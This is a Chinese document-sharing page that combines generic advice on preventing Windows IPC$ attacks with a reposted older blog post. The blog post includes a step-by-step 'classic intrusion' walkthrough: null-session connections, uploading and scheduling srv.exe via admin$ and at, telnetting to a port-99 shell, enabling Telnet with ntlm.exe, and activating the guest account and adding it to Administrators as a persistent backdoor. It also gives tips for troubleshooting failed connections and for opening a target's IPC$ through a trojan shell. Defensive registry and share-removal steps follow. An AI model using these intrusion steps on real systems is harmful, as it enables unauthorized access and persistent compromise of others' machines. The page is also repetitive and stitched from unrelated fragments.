如果一定要完全关闭IPC$共享,可以在“管理工具→服务”中,停止Server服务,但这样的话,系统中的所有共享也将不复存在.3,禁止自动打开默认共享对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanm anServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。

防范ipc$攻击常用方法

防范ipc$攻击常用方法

防范ipc$攻击常用方法
一、防范IPC$攻击的常用方法
1、不要使用非必要的IPC$共享
IPC$共享只应用于非常必要的情况,而且必须采取最严格的安全措施进行保护。

2、增加安全性
通过设置数据库服务器的IPC$共享的安全性来降低IPC$攻击的可能性,可以考虑将服务器上的IPC$共享安全性设置为最高,仅允许管理员组可以访问,并且不允许外界用户访问。

3、定期检查权限
定期检查IPC$共享的访问权限,及时删除多余的权限。

4、减少开放端口及共享
降低IPC$共享攻击的可能性,可以考虑减少需要打开的端口和共享。

5、实施安全策略
在数据库服务器上实施严格的安全策略,包括定期审计和审查系统日志。

6、强制安全设置
可以通过策略管理器强制安全设置来提高数据库服务器的安全性,包括访问控制、帐户管理、安全更新等。

7、增加安全策略
可以通过增加多个安全策略,包括防火墙设置、访问控制、安全
审计等,来进一步增强数据库服务器的安全性。

8、修订网络保护
可以修订网络保护设置,增强服务器的安全性,避免此类攻击的发生。

9、使用安全工具
可以使用安全工具,如检测和病毒查杀的工具,来帮助防止IPC$攻击。

相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

Windows下IPC$的应用与删除(2008-04-11 12:54:45)转载▼分类:操作系统标签:杂谈Windows下IPC$的应用与删除2006年10月30日星期一上午 06:39相关命令建立空连接net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)建立非空连接net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 映射默认共享net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$删除一个ipc$连接net use \\IP\ipc$ /del删除共享映射net use c: /del 删除映射的c盘,其他盘类推net use * /del 删除全部,会有提示要求按y确认经典入侵模式1.C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3.C:\>net time \\127.0.0.1查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4.C:\>at \\127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)5.C:\>net time \\127.0.0.1再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午11:05,那就准备开始下面的命令。

6.C:\>telnet 127.0.0.1 99这里会用到Telnet命令吧,注意端口是99。

Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了7.C:\>copy ntlm.exe \\127.0.0.1\admin$用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools 目录中)。

8.C:\WINNT\system32>ntlm输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm 其实是让这个程序在对方计算机上运行)。

当出现"DONE"的时候,就说明已经启动正常。

然后使用"net start telnet"来开启Telnet服务!9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组10.C:\>net user guest /active:yes将对方的Guest用户激活11.C:\>net user guest 1234将Guest的密码改为1234,或者你要设定的密码12.C:\>net localgroup administrators guest /add将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)ipc$与空连接不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).ipc$与139,445端口ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径 : 网络有问题;错误号53,找不到网络路径: ip地址错误;目标未开机;目标lanmanserver 服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。

错误号1326,未知的用户名或错误密码:原因很明显了;错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。

(连接域控会出现此情况)错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.如何打开目标的IPC$首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。

从上面可以知道,ipc$能否使用还有很多条件。

请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。

如何防范ipc$入侵禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)禁止默认共享1)察看本地共享资源运行-cmd-输入net share2)删除共享(每次输入一个)net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有e,f,……可以继续删除)3)停止server服务net stop server /y (重新启动后server服务会重新开启)4)修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Pa rameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Pa rameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师。

相关文档
最新文档